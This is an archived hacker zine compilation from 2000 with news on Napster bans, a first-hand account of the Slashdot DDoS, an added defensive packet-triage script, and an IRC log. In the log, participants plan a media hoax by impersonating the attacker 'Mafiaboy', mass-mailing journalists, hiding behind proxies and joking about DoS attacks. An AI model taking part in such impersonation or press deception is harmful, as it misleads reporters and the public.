~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.zdnet.com/zdnn/stories/news/0,4586,2568446,00.html
Napster gets tough with Metallica fans
A Napster message board goes dark after a user posts a hack for banned users.
It was either that or go out of business, a company insider said.
By Marilynn Wheeler, ZDNet News
May 12, 2000 5:11 AM PT
Banned Napster users who figured out a way to get back onto the music download
site were foiled late Thursday when instructions were removed from a Napster
message board.
The "Circumventing Napster Bans" user forum was shut down and in its place
was a warning from the company after ZDNet News published a link to the forum.
"Any posts regarding the circumvention of bans placed by Napster will be
deleted and the username will be banned," Napster told visitors to the forum.
"The IP will be logged, and a second offense will trigger an IP ban on the
individual's account."
"The Napster discussion boards are moderated, and they have a policy of
removing any user posts related to working around the user blocks regarding
Metallica," said Napster spokesman Dan Wool.
Doing battle online
Last week Metallica, which is suing Napster for copyright violation, produced
the names of hundreds of thousands of fans who had traded the band's music
online. Napster responded by banning 317,377 users on Wednesday.
The ostracized fans complained they'd been tricked into downloading the latest
version of Napster, which had installed tracking identification on their
computers. Within hours, a way to get back online was posted in a Napster forum.
A user who asked not to be identified protested in an Internet Relay Chat with
one of Napster's developers.
"(The instructions) went down because our PR firm told us to take them down,"
said the developer, identified as "nocarrier." "Having that information on our
boards gives the impression to the world that we support the removal of our lock."
Crying censorship
"So it was removed," replied the user, "MindRape." "But that's censorship."
It's called protecting your company, the developer said. "We will GO OUT OF
BUSINESS for s--- like that! Delete the post, or lose the court battle, and
you lose your napster! This is reality man!"
"You had to do certain things to show you applied effort, but to CENSOR,"
the user replied. "I dunno man, I think that's Orwellian. Well, good luck."
"Thanks. We need it," the developer replied.
@HWA
217.0 [IND] The Slashdot DDoS attack: What happened?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by GTO (http://www.g-t-online.com/)
http://slashdot.org/article.pl?sid=00/05/17/1318233&mode=thread
Posted by CmdrTaco on Wednesday May 17, @10:00AM
from the from-the-horses-mouth dept.
What follows this introduction is a rough summary of the crazy hell that
we endured with the intermittent DDoS attacks we experienced last
Thursday through Saturday. I'm sorry it took this long to put this
together and tell you what happened, but as these things go, we were too
busy trying to solve the problem to waste time talking about it. Big
thanks to Andover.Net's Netops PatL, Martin and Liz, as well as
Slashcode-wranglers PatG, Chris, Marc, Kurt and CowboyNeal, plus scoop
(from freshmeat) and others who chimed in along the way. Tomorrow is
part2: A good description of how the new Slashdot @ Exodus works.
What follows is more-or-less Pat "BSD-Pat" Lynch's account of the DDoS...
Pat is our super 31337 BSD Junkie sysadmin. He wants everyone to know that
the timeline below is a little screwy, but things are more or less in
sequential order. Things might not be exactly perfect, but hey, what do
you expect after 30 hours without sleep?
Having moved the day before, none of us were truly familiar with exactly
how the new hardware would handle the full burden of being 'slashdot.org'.
The cluster (known affectionately as The Matrix) had handled its premiere
day with flying colors, but we didn't really have an accurate feel of how
things would react. Combine this with a couple of extremely high traffic
stories posted on both Thursday and Friday, and it took us a while to
determine that the problems were external, and not a flaw in some new
component in the cluster.
The Attacks began Thursday morning. Most of it came in the form of SYN
floods, from obvious /16's no less, and some /24's. We didn't have any
zombie-killing software or a firewall installed because of certain network
topology issues. Later on, a second wave came, this closer to 8 or 9pm and
the load balancer (an Arrowpoint CS-100) died under the load.
The DDoS, as far as I could see, was a lot of SYN and Zero port packets
coming from various /16's and /24's as well as a bunch of RFC1918 reserved
addresses (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16) At one point we
reached 109Mbits worth of traffic into our network.
Liz and I went back to Exodus and rebooted the Arrowpoint, then the site
seemed "ok" for a bit. By 3 in the morning, Liz decided that the PIX
(Cisco's firewall) could simply not do what it was supposed to do, so we
went back and started building a FreeBSD box as a bridging firewall.
Just before we went to plug it in, I tried to ssh into the vpn-gate and
noticed that nothing was working right: while the site worked, outgoing
traffic and source groups on the Arrowpoint were screwed. As if that wasn't
enough, two ports died on it already!
At some unknown point (time blurs after 30 hours straight!) Martin and
PatG show up (thank the gods!) and they force us to go to sleep, they
bring the site up outside the Arrowpoint, while Liz and I watch from a
hotel room.
As of Friday morning, the site is semi-working, but the adsystem can't be
updated, and we have no access to the backend servers. I scream bloody
murder to Arrowpoint, who eventually shows up to blame the router: a cisco
6509 switch with two RSM/MSFCs.
Liz and I do packet dumps and determine it's not the router, the little
CS-100 had died the night before, and that's where it all started. The
Arrowpoint guy insists we did something to make the Arrowpoint not work
(CT: Explicit description of precisely where Liz and Pat wanted to
store the newly deceased Arrowpoint removed to keep things rated PG) By 7
the CS-800 CSS is up, we're almost done for the day, but we stay to make
sure. By 10pm we're exhausted but stable, although we're running 4 servers
on a round-robin DNS while the new load balancer waits.
Netops (Liz, Martin and I) regroup, and do reintegration of new
Arrowpoint CS-800 and installation of a new FreeBSD Firewall box instead
of the PIX during Saturday Afternoon. Slashdot returns to normal.
Sysadmins get well-deserved sleep.
So that was the story. It was a pretty hellish weekend for everyone
involved, but thanks again to those that helped get our ducks back in a
row. Again, Part #2 to this (which originally was gonna be run last
Thursday, but with all this ddos stuff got pushed aside) is a fairly
detailed description of the new Slashdot setup at Exodus, complete with
all the changes mentioned above. Fun for the whole family if your family
is really into clusters of web servers.
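An added example, not part of the Slashdot post: one way to triage a capture for the traffic the account describes, flagging RFC1918 sources and port-zero packets that have no business arriving on an Internet-facing interface, then grouping the remaining bare SYNs by source /16 and /24 to show where a flood concentrates. The record format, the sample packets, the threshold and all function names are constructed for illustration.

```python
import ipaddress
from collections import Counter, namedtuple

Packet = namedtuple("Packet", "src sport dst dport flags")

# The three private ranges named in the account. A packet arriving from the
# Internet with one of these as its source address is spoofed or misrouted.
RFC1918 = tuple(ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"))

# Constructed capture summary, one packet per line:
#   src_ip:src_port dst_ip:dst_port tcp_flags   (S = SYN, A = ACK, P = PSH)
# 203.0.113.10 stands in for the web server. 198.18.0.0/15 and 198.51.100.0/24
# are reserved test ranges used here to play the part of flooding networks.
SAMPLE = """\
198.18.4.77:1042 203.0.113.10:80 S
198.18.9.12:1043 203.0.113.10:80 S
198.18.200.3:1044 203.0.113.10:80 S
198.18.77.250:1045 203.0.113.10:80 S
198.51.100.5:2000 203.0.113.10:80 S
198.51.100.6:2001 203.0.113.10:80 S
198.51.100.7:2002 203.0.113.10:80 S
10.1.2.3:4000 203.0.113.10:80 S
172.20.5.9:4001 203.0.113.10:80 S
192.168.1.50:4002 203.0.113.10:80 S
192.0.2.44:0 203.0.113.10:0 S
192.0.2.80:51515 203.0.113.10:80 A
192.0.2.81:51516 203.0.113.10:80 PA
"""


def parse(line):
    """Turn one 'src:port dst:port flags' line into a Packet."""
    src, dst, flags = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return Packet(ipaddress.ip_address(sip), int(sport),
                  ipaddress.ip_address(dip), int(dport), flags)


def drop_reason(pkt):
    """Return why an ingress filter should drop pkt, or None if it may pass."""
    if any(pkt.src in net for net in RFC1918):
        return "rfc1918-source"
    if pkt.sport == 0 or pkt.dport == 0:
        return "zero-port"
    return None


def syn_hotspots(packets, prefix_len, threshold):
    """Count bare SYNs per source network of the given prefix length and
    return only the networks at or above the threshold."""
    counts = Counter()
    for p in packets:
        if p.flags == "S":
            net = ipaddress.ip_network(f"{p.src}/{prefix_len}", strict=False)
            counts[str(net)] += 1
    return {net: n for net, n in counts.items() if n >= threshold}


def triage(text, threshold=3):
    """Split a capture into statically droppable packets and SYN hotspots."""
    packets = [parse(line) for line in text.splitlines() if line.strip()]
    dropped = Counter()
    survivors = []
    for p in packets:
        reason = drop_reason(p)
        if reason:
            dropped[reason] += 1
        else:
            survivors.append(p)
    return {
        "total": len(packets),
        "dropped": dict(dropped),
        # A flood spread across a /16 shows up here even when no single /24
        # inside it crosses the threshold.
        "syn_by_16": syn_hotspots(survivors, 16, threshold),
        "syn_by_24": syn_hotspots(survivors, 24, threshold),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

The static drops need no state and belong at the network edge; the per-prefix counts are what tell an operator whether a block at /16 or at /24 granularity would cover the flood.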
@HWA
218.0 [IND] China Executes Bank Manager for Computer Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 31, 2000
China Executes Bank Manager for Computer Crime
Human rights were thrown out of the window when China executed a bank
manager for embezzling more than 2 million yuan by manipulating computer
records. According to China's state-run media, Shen and an accomplice were
falsifying records and diverting funds into a personal account.
The accomplice still remains at large. Full story here. <lost link>
@HWA
219.0 [IND] Data Transmission Pioneer Passes Away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 31, 2000
Data Transmission Pioneer Passes Away
Donald W. Davies, whose work included leading the team that built one of the first functioning
networks using packet data, has passed away at age 75. Credited with coining the term "packet
switching", Davies was one of the first people to realize that data needed to be broken into
discrete packets and not transmitted as whole files. Davies later began his focus on computer
security, conducting studies for teleprocessing systems, financial institutions, and government
agencies. His books included "Communication Networks for Computers" in 1973, "Computer
Networks and their Protocols" in 1979, and "Security for Computer Networks" in 1984. Full story
here. <lost link>
@HWA
220.0 [IND] Canada Agrees to Drop Big Brother Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 30, 2000
Canada Agrees to Drop Big Brother Files
In response to public outcry, the Canadian government has agreed to dismantle a large
database that held as many as 2000 pieces of information on each of its citizens. Human
Resources Minister Jane Stewart publicly stated that, "Given public concerns about privacy issues
in this era of advanced and constantly changing technology, I have chosen an approach that
addresses future threats to privacy." Full story here. <lost link>
@HWA
221.0 [IND] Senate Bill Will Make Minor Computer Hacking a Felony
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://packetstorm.securify.com/ News bulletin.
May 25, 2000
Senate Bill Will Make Minor Computer Hacking a Felony
Penned the "Internet Integrity and Critical Infrastructure Protection Act," bill number S. 2448 will
make minor computer offenses felonies, opening the door for the FBI and Secret Service to
investigate. Other bills that the Senate is attempting to sneak by include the further expansion
of wiretapping authority, which includes allowing the federal government to seize the house
where the offending computer is residing, and making all computer crimes a predicate for
wiretaps. Full story here. <lost link>
The United States government is clearly being swept up in the mayhem caused by the ILOVEYOU
virus. These bills are repressive and infringe on the rights of all United States citizens. If you find
any of this the least bit disturbing, please contact your local Congressman and Senator.
@HWA
222.0 [IND] McAfee considers Netbus pro legitimate tool
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hacking tool slips through McAfee's net
McAfee's VirusScan software will no longer detect intrusion
by a Trojan Horse-based remote administration tool used by
hackers because it considers the product legitimate.
NetBus Pro is a commercial tool made by UltraAccess
Networks that allows machines to be monitored and files to
be accessed. But the product is based on the infamous
Trojan Horse called NetBus and has been used illegally by
hackers to gain access to systems.
McAfee used to report when it detected NetBus Pro in a
network, but last week Network Associates, which publishes
VirusScan, decided that it would no longer report incidences
of NetBus Pro intrusions.
Jack Clark, European product manager for Network
Associates, said: "McAfee will pick up the NetBus Trojan, but
the Pro product is a genuine remote access tool."
He said there is no point alerting network managers
whenever the tool is used legitimately, adding that the
weekly update of the drivers for VirusScan would include a fix
to halt some illegal uses of NetBus Pro.
"There is a way to hide the code on a user machine," said
Clark. "The update will detect if someone attempts to hide
their use of NetBus Pro in another file."
One of the original authors of the network intrusion tool Back
Orifice, who is now a consultant for security adviser @Stake,
said the hacker community has welcomed the news.
He added that these kinds of decisions were often influenced
by legal concerns that rival remote access tools might be
scanned out as viruses involving companies in antitrust
battles.
Judd Spence, chief executive of UltraAccess, said there were
many similar software programs that were not scanned by
antivirus software.
First published in Network News
If you would like to comment on this article email us @
newseditor@vnunet.com
@HWA
223.0 [HWA] The Hoax
~~~~~~~~~~~~~~
I debated on whether or not to post this info/log since it has little real news merit
but does have some potential social-disobedience overtones to it and is subversive in
nature, after discussing it with several people and a reporter who shall remain
unnamed it was decided it had merit in its own right so here it is to peruse and take
as you will - Ed
One night in the underground...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Two hackers were bored one night and decided to perpetrate a hoax;
here is an overview of what transpired (Edited)
I was almost pulled into the event as it unfolded, my involvement
was minimal as I deal with real news not fake news however since
I am known some people went ahead and assumed I gave the plans my
blessings and included my site/zine without my consent, I asked
for it to be removed from the original "press release" and it was.
http://www.news.insource.nl/
Mafiaboy holds chat
19 May 2000
The Canadian Mafiaboy, who pleaded guilty to carrying out DoS attacks on various
large sites, is holding a chat in which anyone can ask him questions. The chat takes place on 20
May at 21:00 EST on EfNet in the channel #media-event. There he will answer all questions
about what has happened to him and what is going to happen.
Source: Frank van Vliet
RAW INFO:
How it started:
[15:00] *** SliPY is now known as Mafiaboy
[15:00] <Mafiaboy> ./tfn world
[15:01] <Cruciphux> ppl aren't drunk enough to laugh at that yet
[15:02] <MrEreet> :)
[15:02] <Mafiaboy> give me a few hrs
[15:02] <Mafiaboy> tilli get drunk
[15:02] <MrEreet> hehe
[15:02] <Mafiaboy> and really make an ass of myself
[15:02] <MrEreet> ok
[15:02] * MrEreet gets ready to sell tickets and starts work on the promotional website ...
[15:03] <MrEreet> wanna have some fun?
[15:03] <MrEreet> should set up a fake news conference and get media online
[15:03] <Mafiaboy> well
[15:03] <Mafiaboy> the police
[15:03] <MrEreet> engage net media hype hoax #1
[15:03] <Mafiaboy> are doing a news conference
[15:03] <Mafiaboy> about me soon
[15:03] <MrEreet> another one?
[15:03] <Mafiaboy> it will be on cnn/cbc/global/atv (local/national news)
[15:04] <Mafiaboy> the rcmp ;/
[15:04] <MrEreet> "and there was much rejoicing"
[15:04] <Mafiaboy> heh
[15:04] <Mafiaboy> i hate the media
[15:04] <Mafiaboy> they blow shit out of proportion and stuff
[15:04] <Mafiaboy> like calling mafiaboy
[15:04] <Mafiaboy> a hacker
[15:05] * tekneeq is away: (.) [BX-MsgLog Off]
[15:05] *** logistix (x25@mumma-said-knock-you-out.*.uk) has joined #darknet
[15:05] <choppah4> bleh....
[15:05] <Cruciphux> sveditorial@sjmercury.com - SILICON VALLEY.COM
[15:05] <Cruciphux> tips@news.com - C|Net News tips
[15:05] <Cruciphux> paulf@cnet.com - columnist for C|Net NEWS.COM
[15:05] <Cruciphux> patrick_houston@zdnet.com - <patrick_houston@zdnet.com>
[15:05] <Cruciphux> Bob.Sullivan@msnbc.com - M$NBC
[15:05] <Cruciphux> adam.wolf@reuters.com - REUTERS Newswire
[15:05] <Cruciphux> nancy.bobrowitz@reuters.com
[15:05] <Cruciphux> news@pulse24.com - CityTV Toronto
[15:05] <Cruciphux> comments@foxnews.com - FOX news TV
[15:05] <Cruciphux> tips@wired.com - Wired media
[15:05] <Cruciphux> tips@news.com - NEWS.com
[15:05] <Cruciphux> mo@cmp.com -
[15:05] <Cruciphux> start mailing
[15:05] <MrEreet> heh
[15:06] <MrEreet> mass invite people to #media-event
[15:06] <Cruciphux> lol
[15:07] <choppah4> hehe "#leechasf eats a big fat hairy dick.../join #media-event"...
[15:07] <MrEreet> TONIGHT MAFIABOY'S UNDERGROUND CYBERGANG THREATENS ATTACKS'
[15:07] <MrEreet> some would come
[15:07] <MrEreet> dumbasses
[15:07] *** gw4hn sets mode: +o logistix
[15:07] <Mafiaboy> heheh
[15:07] <Cruciphux> fuck jennycam made the news
[15:08] <choppah4> hehe...
[15:08] <Mafiaboy> anyone wanna pull a fake media event?
[15:08] <Cruciphux> and how many times did we take that over
[15:08] <choppah4> yeah, but honestly...its jennycam...hehe...
[15:08] <Mafiaboy> i'll pose as mafiaboy
:
Session Start: Fri May 19 15:08:53 2000
Session Ident: Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net)
[15:08] <Mafiaboy> no seriously
[15:08] <Mafiaboy> u wanna do somethin like this?
[15:09] <Mafiaboy> say mafiaboy speaks out etc
[15:09] <MrEreet> fuck i'm bored enough
[15:09] <MrEreet> haha
[15:09] <Mafiaboy> same
[15:09] <Mafiaboy> and i got no life
[15:09] <Mafiaboy> heh
[15:09] <MrEreet> hehe
Session Close: Fri May 19 15:11:22 2000
:
[15:08] <MrEreet> :)
[15:08] <MrEreet> http://www.lightspeed.de/irc4all/
[15:08] <MrEreet> grab yer proxies
[15:08] <MrEreet> heh
[15:08] <Mafiaboy> proxy? heh i'm on a eleet shell
[15:08] <MrEreet> http://www.cyberarmy.com/lists/proxy/
[15:09] <MrEreet> http://proxylist.virtualave.net/
[15:09] <MrEreet> http://proxylist.hypermart.net/list.htm
[15:09] <Mafiaboy> well
[15:09] <Mafiaboy> i'm gonna bot mafiaboy
[15:09] <MrEreet> there thats like 7k worth some might work
[15:09] <Mafiaboy> for a while i think
[15:09] <Mafiaboy> hope they don't packet me too bad
[15:10] * [crow] is idle, auto-away after 10 mins. (l:On/p:On)
[15:10] *** SugarKing (sugaking@*.net) has joined #darknet
[15:11] * [crow] is back from the grave (53s)
[15:13] *** |eXiSt| has quit IRC (|eXiSt| has no reason)
[15:14] *** MrEreet is now known as Mitnick-
[15:15] *** Mitnick- is now known as Optik-
[15:21] * [crow] is idle, auto-away after 10 mins. (l:On/p:On)
[15:21] * [crow] is back from the grave ()
[15:21] * [crow] is idle, dinner (l:On/p:On)
[15:21] * tekneeq is back from the dead. .
[15:24] *** Optik- is now known as MrEreet
[15:24] <Cruciphux> **** That beta Ircd code is EXPLOITABLE *****
[15:25] <Cruciphux> info to come later
[15:25] <Cruciphux> (that isn't a joke)
[15:25] <tekneeq> cruc
[15:25] <tekneeq> op me
[15:26] *** Cruciphux sets mode: +o tekneeq
[15:26] <Tutor> hrm..
[15:26] <MrEreet> #media-event massive hoax in planning invite yer buddies we're gonna give CNN something entertaining
[15:26] <Tutor> tekneeq: bandwidth came back up...but gotr00t is hrm...fucked up
[15:26] <MrEreet> pass it on but don't give the game away
[15:27] <tekneeq> Tutor: ack
[15:27] *** tekneeq sets mode: +o Tutor
[15:27] <Tutor> yeah i think they locked a MAC into the IP (idiots...)
[15:27] <Tutor> but ultrapimpz is up....no DNS tho heh
[15:27] <Tutor> .114 and .112 both down...whores..
[15:28] *** SpYrOOt (~anomaizer@*.s3curity.com) has joined #darknet
[15:28] *** logistix is now known as aSsBaNdiT
[15:28] *** mountd has quit IRC (Ping timeout)
[15:31] *** klatch- (i0@*.cybercity.no) has joined #darknet
[15:31] *** i0 has quit IRC (Ping timeout: 180 seconds)
[15:31] *** klatch- is now known as i0
[15:31] *** LOB_Niall has quit IRC (xchat exiting..)
[15:38] *** CodeZero (~code@*.com) has joined #Darknet
[15:38] *** ojz (cazper@*.langame.net) has joined #darknet
[15:40] *** snake- (snake@*.uno.edu) has joined #darknet
[15:42] *** kgb-kid sets mode: +o CodeZero
[15:42] <aSsBaNdiT> cz0
[15:42] <aSsBaNdiT> wtf
[15:43] <CodeZero> hum?
[15:44] <kgb-kid> <gov-boi> hum what? ;))
[15:45] <CodeZero> hi gov
[15:49] *** psy_eye (psy_eye@*.yu) has joined #darknet
[15:50] <MrEreet> #media-event pass it on
[15:51] *** psy_eye has quit IRC (SendQ exceeded)
[15:52] *** Mafiaboy is now known as SLiPY
[15:54] *** CodeZero has quit IRC (Ping timeout: no data for 248 seconds)
[15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98)
[15:57] *** CodeZero (~code@*.com) has joined #darknet
[15:59] *** Shylock_ (juice@*.edu) has joined #darknet
[16:00] *** typo_ (typo@inferno.*.edu) has joined #darknet
[16:01] *** oxigen (oxigen@*.at) has joined #darknet
[16:01] <typo_> hi oxigen
[16:01] <typo_> alle leet ?
[16:02] <oxigen> überleet ;)
[16:02] <tekneeq> uber alle
[16:02] <tekneeq> uber alles
[16:03] *** m1x (m1x@*.org) has joined #darknet
[16:03] <tekneeq> cd /tmp
[16:03] <typo_> haha
[16:03] <tekneeq> cd: command not found
[16:03] <tekneeq> SWEET
[16:03] <typo_> m1x: all of us joining now ;)
[16:03] <m1x> Hi
[16:08] *** Disconnected
-=-
Meanwhile behind the scenes in the 'control-booth' ...
Session Start: Fri May 19 15:41:40 2000
[15:41] *** Now talking in #media-admin
[�] Channel [ #media-admin ] Modes [ + ]
[15:41] *** MrEreet sets mode: +snt+k pimped
[15:42] *** Mafiaboy (SLiPY@dont.make.me.cap.yer.ass.and.throw.u.in-jail.net) has joined #media-admin
[15:42] *** MrEreet sets mode: +o Mafiaboy
[15:42] *** MrEreet changes topic to 'Hack of the millennium secret planning council'
[15:42] <MrEreet> :)
[15:43] *** i0 (i0@*.cybercity.no) has joined #media-admin
[15:43] <i0> Idle :P
[15:43] *** k-rad-bob (mobys_dick@*.cybercity.no) has joined #media-admin
[15:43] <MrEreet> {} is ok
[15:43] <MrEreet> he hacked apache.org
[15:43] <MrEreet> leave the ops just get ppl talking here
[15:44] <i0> lol
[15:44] <i0> wut if fbi trace you down
[15:44] <i0> hehe
[15:44] <MrEreet> i'll be using a proxy
[15:44] <i0> I will be here
[15:44] <i0> wouldnt want to miss it
[15:45] *** flatline` (lick@*.euronet.nl) has joined #media-admin
[15:45] *** twilight- (vvarder@*.com) has joined #media-admin
[15:45] <i0> we could start mass dosing and shit to make it big
[15:45] <i0> ;)
[15:45] <k-rad-bob> can i get a short summary of the "plans"?
[15:45] <k-rad-bob> i joined in pretty plate :/
[15:45] <flatline`> Mafiaboy, you want me to contact dutch magazines or not?
[15:45] <MrEreet> the idea of mass defacements crossed my mind but It wasn't my idea
[15:45] <MrEreet> :-)
[15:45] *** Amoeba (webmaster@*.net) has joined #media-admin
[15:45] <flatline`> heh
[15:45] <MrEreet> flatline` yeh
[15:46] <MrEreet> might want to use an alias so u don't blow your rep though
[15:46] <flatline`> i need the e-mail.
[15:46] *** SugarKing (sugaking@*.net) has joined #media-admin
[15:46] <flatline`> forward it to flatline@*.com plz
[15:46] <MrEreet> and start thinking
[15:46] <MrEreet> coz if someone contacts the real mafiaboy ...
[15:46] <i0> Anyone know wut 9pm est is in norwegian time
[15:46] <MrEreet> it should be vague
[15:47] <Amoeba> what kind of hoax is this?
[15:47] <MrEreet> http://www.timeanddate.com/time/abbreviations.html
[15:47] *** Mafiaboy sets mode: +ooo Amoeba flatline` i0
[15:47] *** Mafiaboy sets mode: +ooo k-rad-bob SugarKing twilight-
[15:47] *** Mafiaboy sets mode: -o i0
[15:48] *** Mafiaboy sets mode: -o Amoeba
[15:48] <i0> tanx
[15:48] *** Mafiaboy sets mode: +vv Amoeba i0
[15:48] <Amoeba> hey!
[15:48] <Amoeba> no ops?
[15:48] <MrEreet> maybe we give them too much time
[15:49] <Mafiaboy> oh well
[15:49] <SugarKing> hmm
[15:49] <Mafiaboy> tommorow gives them time to check email
[15:49] <SugarKing> think any media outlets are actually gonna show?
[15:49] <Mafiaboy> tommorow nite will be good
[15:50] <Amoeba> so, what's the plan here?
[15:50] <Mafiaboy> well
[15:50] <Mafiaboy> 30 media places have been contacted
[15:50] <Mafiaboy> they come in
[15:50] <Mafiaboy> ask questions
[15:50] <Mafiaboy> we give serious answers
[15:50] <Mafiaboy> it will be mad fun
[15:50] <Mafiaboy> make news and shit
[15:50] <Amoeba> about what?
[15:50] <Mafiaboy> and then we talk aboit
[15:50] <Mafiaboy> and then we talk about
[15:50] <Mafiaboy> our plan
[15:50] <Amoeba> what did you tell them?
[15:50] <Mafiaboy> to takeover the world
[15:50] <Mafiaboy> ;)
[15:50] <Mafiaboy> i sent a formal email
[15:50] <SugarKing> haha
[15:50] <Mafiaboy> not lame or anything
[15:50] <Amoeba> lol
[15:51] <MrEreet> fwd me the email MrEreet@dok.org
[15:51] <SugarKing> ya
[15:51] <SugarKing> it'll be real funny if it makes it
[15:51] <Amoeba> yeah, forward me what you sent them
[15:51] <MrEreet> might wanna make the topic a little more interesting
[15:51] <MrEreet> heh
[15:51] <SugarKing> heh
[15:51] <Mafiaboy> all the @'s will talk about after the questions directed to mafiaboy, me at the time most likely, and then we talk about our plans to take over the world by packetting and all serious fun shit
[15:51] <MrEreet> where'd Debris go
[15:51] <Mafiaboy> and that the rcmp won't keep us down
[15:51] <MrEreet> he's probably on the fone with mafiaboy
[15:51] <MrEreet> his sister dated him
[15:51] <MrEreet> heh
[15:51] <i0> espen@*.de forward there too
[15:52] *** Mafiaboy is now known as SLiPY
[15:52] <SugarKing> MrEreet: haha, really?
[15:52] <MrEreet> yeh
[15:52] <SugarKing> that's fucked
[15:52] <SLiPY> <SLiPY> gotta bot it
[15:52] <SLiPY> <SLiPY> put it on a better host
[15:52] <SLiPY> <SLiPY> till tommorow nite
[15:52] <SLiPY> <SLiPY> so when mafiaboy comes on
[15:52] <SLiPY> <SLiPY> he can use it
[15:52] <SLiPY> we gotta talk all fake and shit
[15:53] <Amoeba> is Mafiaboy in jail?
[15:53] <SLiPY> nah
[15:53] <SugarKing> not yet
[15:53] *** Debris (3223@*.montreal.*.net) has joined #media-admin
[15:53] <SLiPY> he wont be
[15:53] <MrEreet> lets call him
[15:53] <SugarKing> ya
[15:53] <Amoeba> why?
[15:53] <SugarKing> too young
[15:53] <Debris> call who
[15:53] <MrEreet> someone set up a conf
[15:53] *** SLiPY sets mode: +o Debris
[15:53] <Amoeba> oh
[15:54] <Amoeba> then Juvenile Detention?
[15:54] <MrEreet> mafiaboy
[15:54] <MrEreet> haha
[15:54] <SLiPY> no
[15:54] <SLiPY> he's at home
[15:54] <SugarKing> i dunno if they have that shit in Canada
[15:54] <Amoeba> well what's gonna happen to him?
[15:54] <SLiPY> Following the surprise plea the judge served the maximum sentence of 240 hours of community work plus one year's probation, restricted use of a computer, and ordered the defendant to deliver a speech at a local high school court on the evils of hacking.
[15:54] <SLiPY> thats why he is talkin to us.
[15:54] <Debris> mafiaboy lives 5minutes awayfrom me heh
[15:54] <Debris> slipy
[15:54] <Debris> thats j0n
[15:54] <Debris> not mafiaboy
[15:54] <MrEreet> Debris go get him
[15:54] <MrEreet> hehe
[15:54] <Debris> h3h
[15:54] <Debris> his parents dont let me in the house
[15:54] <Amoeba> so someone is going to pose as Mafiaboy?
[15:54] <Debris> my sisters in 3 of his classes
[15:54] <MrEreet> don't forget to mention as much as you can about the awesome HWA zine
[15:55] <MrEreet> j/k
[15:55] <Amoeba> how old is he?
[15:55] <MrEreet> rofl
[15:55] <Debris> fone
[15:55] <SugarKing> Debris: he still goes to school?
[15:55] <Amoeba> mention about my site
[15:55] <Amoeba> www.g-t-online.com
[15:55] <SugarKing> he must be, popular, hahahah
[15:55] <k-rad-bob> lol cru
[15:55] <SLiPY> debris
[15:55] <SLiPY> u sure?
[15:55] <MrEreet> haha shouldn't have said that
[15:55] *** i0 has quit IRC (Hiroshima 45, Chernobyl 86, Windows 98)
[15:55] <SLiPY> i thought it was mafiaboy
[15:55] <MrEreet> anyone spamming dalnet and undernet #hackphreak etc?
[15:56] <SugarKing> SLiPY: different people
[15:56] <SugarKing> one hacked MIT and NASA
[15:56] <MrEreet> i lost him
[15:56] <flatline`> SLiPY, did you forward that e-mail?
[15:57] <k-rad-bob> cruci: are you going to be featuring this in next hwa issue?
[15:57] <SugarKing> he has too
[15:57] <SLiPY> flat, whats the email?
[15:57] <SugarKing> he'd be dumb not to:)
[15:57] <Amoeba> How We Fooled the Media
[15:57] <MrEreet> k-rad-bob lol
[15:58] <flatline`> SLiPY: flatline@*.com
[15:58] <SugarKing> I would consider it twice though
[15:58] <SugarKing> you wouldn't be trusted with wired or anyone else
[15:58] <MrEreet> I admit i had no news or ideas so when that happens you do what 2600 does and manufacture irc logs to make news
[15:58] <SugarKing> most likely
[15:58] <MrEreet> oh someone tell #2600 but don't mention hoax those tight asses will expose it
[15:59] <Amoeba> lol
[15:59] <SugarKing> 2600 is gay
[15:59] <MrEreet> emmanuel is okIyAnsDV@2600.COM * Emmanuel Goldstein
[15:59] <MrEreet> emmanuel using irc.concentric.net Concentric Network Corporation
[15:59] <MrEreet> emmanuel has been idle 9hrs 11mins 39secs, signed on Thu May 18 03:45:18
[15:59] <SugarKing> hmm
[15:59] <Amoeba> they breaks sticks with their but cheeks?
[15:59] <MrEreet> he gets media tho
[15:59] <SLiPY> dude
[15:59] <SugarKing> i doubt he'll buy it though
[15:59] <SLiPY> if u want the email letter i sent out
[15:59] <SLiPY> say yer email
[15:59] <SLiPY> i'll reply
[15:59] <SLiPY> and u guys forward it more to people
[15:59] <SLiPY> i did like 30 agencies now
[15:59] <Amoeba> I_am_the_real_gto@yahoo.com
[16:00] <Amoeba> Cruci, answer my msgs
[16:00] <MrEreet> k
[16:02] <MrEreet> might be fun if it doesn't fall apart
[16:02] *** SLiPY sets mode: -o Debris
[16:02] *** SLiPY sets mode: +o Debris
<snip>
[16:02] <MrEreet> don't lose ops
[16:02] <MrEreet> heh
[16:02] <twilight-> i did, it just got reset cuz the bot relinked to it
[16:02] <SLiPY> ok
[16:02] <SLiPY> debris
[16:02] <SLiPY> sorry bout that
[16:02] <SLiPY> bot trouble
[16:02] <Debris> i dont care heh
[16:03] <Debris> just only op bots
[16:03] <Amoeba> who is mafiaboy?
[16:03] <Debris> and keep the channel in lock down
[16:03] <MrEreet> hehe
[16:03] <MrEreet> its a secret
[16:03] <Amoeba> who is he?
[16:03] <Amoeba> a bot?
[16:03] <twilight-> you want me to lock it?
[16:03] <MrEreet> Amoeba the real one?
[16:03] <Debris> an evil hacker
[16:03] <MrEreet> he DoS'd some big name websites off the net
[16:03] <MrEreet> yahoo and cnn
[16:03] <MrEreet> etc
